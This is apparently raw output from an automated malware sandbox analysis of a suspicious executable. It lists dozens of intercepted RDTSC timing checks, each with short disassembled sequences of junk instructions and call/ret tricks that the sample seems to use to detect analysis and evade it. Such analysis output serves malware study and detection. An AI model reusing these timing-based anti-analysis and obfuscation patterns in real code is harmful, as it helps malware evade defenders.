Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E54C5 second address: 9E5559 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+12450DC1h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FF4C0501598h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D2246h], eax 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov dword ptr [ebp+12455C22h], ebx 0x00000044 mov eax, dword ptr [ebp+122D0D69h] 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007FF4C0501598h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000015h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 xor dword ptr [ebp+122D19C3h], ecx 0x0000006a mov bx, 2BBDh 0x0000006e push FFFFFFFFh 0x00000070 cld 0x00000071 mov ebx, dword ptr [ebp+122D361Fh] 0x00000077 nop 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E5559 second address: 9E555D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E555D second address: 9E557D instructions: 0x00000000 rdtsc 0x00000002 js 00007FF4C0501596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF4C05015A0h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E90A6 second address: 9E90AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E244B second address: 9E244F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9E9392 second address: 9E9396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9F16A2 second address: 9F16AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9F1AC7 second address: 9F1AE2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF4C0C3E166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FF4C0C3E16Bh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9FC6B3 second address: 9FC6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9FC6B8 second address: 9FC6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9FC6BD second address: 9FC718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007FF4C05015A6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007FF4C05015A0h 0x0000001b jc 00007FF4C0501596h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007FF4C05015A9h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9FC718 second address: 9FC71C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9FBB39 second address: 9FBB49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C050159Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9FBE16 second address: 9FBE1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9FBFBC second address: 9FBFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C05015A9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9FBFDF second address: 9FC011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jnc 00007FF4C0C3E166h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FF4C0C3E16Eh 0x00000015 jmp 00007FF4C0C3E16Bh 0x0000001a push esi 0x0000001b pop esi 0x0000001c jc 00007FF4C0C3E166h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9FC526 second address: 9FC52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A01AB7 second address: A01ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF4C0C3E16Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A01ACF second address: A01AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A01AD3 second address: A01B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FF4C0C3E174h 0x0000000f jmp 00007FF4C0C3E175h 0x00000014 popad 0x00000015 js 00007FF4C0C3E16Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A01B0F second address: A01B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D7651 second address: 9D765B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D765B second address: 9D765F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D86AD second address: 9D86B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D86B3 second address: 9D86B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A00F40 second address: A00F4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FF4C0C3E166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A00F4C second address: A00F80 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007FF4C0501596h 0x00000009 pop edx 0x0000000a jg 00007FF4C050159Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FF4C05015A0h 0x00000018 pushad 0x00000019 js 00007FF4C0501596h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A00F80 second address: A00F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A01253 second address: A01257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A01257 second address: A01260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A013CC second address: A01428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF4C050159Ch 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FF4C05015A9h 0x00000012 jmp 00007FF4C05015A7h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF4C05015A4h 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A01542 second address: A01561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF4C0C3E176h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A01561 second address: A01580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A016BA second address: A016C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A016C0 second address: A016C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A0A0C5 second address: A0A0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF4C0C3E16Eh 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A0A0DF second address: A0A0E9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF4C0501596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A0A0E9 second address: A0A0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A0A0F5 second address: A0A106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF4C050159Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A0A4E4 second address: A0A4FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A0A4FE second address: A0A505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A0A661 second address: A0A681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E176h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A1041B second address: A1042D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a js 00007FF4C0501596h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A1042D second address: A1043A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A1043A second address: A1046B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF4C05015B5h 0x00000008 jmp 00007FF4C05015A5h 0x0000000d jmp 00007FF4C050159Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FF4C0501596h 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A10723 second address: A10754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E173h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF4C0C3E16Eh 0x0000000e jmp 00007FF4C0C3E16Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A10754 second address: A10774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FF4C050159Ch 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A0FEAE second address: A0FEB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A0FEB2 second address: A0FEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A10C98 second address: A10CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF4C0C3E166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A10CA2 second address: A10CB8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF4C050159Ah 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A10CB8 second address: A10CBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A10CBE second address: A10CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ecx 0x00000008 js 00007FF4C050159Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A10CCE second address: A10CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnp 00007FF4C0C3E166h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A184A3 second address: A184A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A184A9 second address: A184B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A1B4C0 second address: A1B4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A1B4C6 second address: A1B4D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A1B4D6 second address: A1B4E9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FF4C0501596h 0x00000009 jnp 00007FF4C0501596h 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A1B4E9 second address: A1B4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF4C0C3E166h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A1B4F5 second address: A1B51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FF4C05015A8h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A1AF4B second address: A1AF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A22509 second address: A22512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A22512 second address: A22521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C0C3E16Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A22521 second address: A22532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push edi 0x00000009 jc 00007FF4C0501596h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A20F57 second address: A20F62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A213DC second address: A213E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A21566 second address: A21584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF4C0C3E174h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A21584 second address: A215A5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF4C0501596h 0x00000008 jmp 00007FF4C05015A7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A215A5 second address: A215AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A215AB second address: A215C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C05015A3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D7F92 second address: 9D8002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF4C0C3E16Bh 0x00000008 jmp 00007FF4C0C3E178h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov ebx, dword ptr [ebp+1248E2C2h] 0x00000019 and di, A815h 0x0000001e add eax, ebx 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FF4C0C3E168h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov cx, 58C5h 0x0000003e mov dx, ax 0x00000041 and edi, 02BCFD15h 0x00000047 nop 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push ebx 0x0000004d pop ebx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D8002 second address: 9D8008 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D8008 second address: 9D8025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4C0C3E179h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D8025 second address: 9D8038 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FF4C0501598h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 9D8209 second address: 9D820D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 992628 second address: 99263B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007FF4C0501596h 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99263B second address: 992641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 992641 second address: 992677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C05015A5h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF4C05015A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 992677 second address: 99267B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 99267B second address: 992691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF4C050159Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A24F1E second address: A24F28 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF4C0C3E166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A2A039 second address: A2A03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A29665 second address: A2966B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: A2966B second address: A29671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
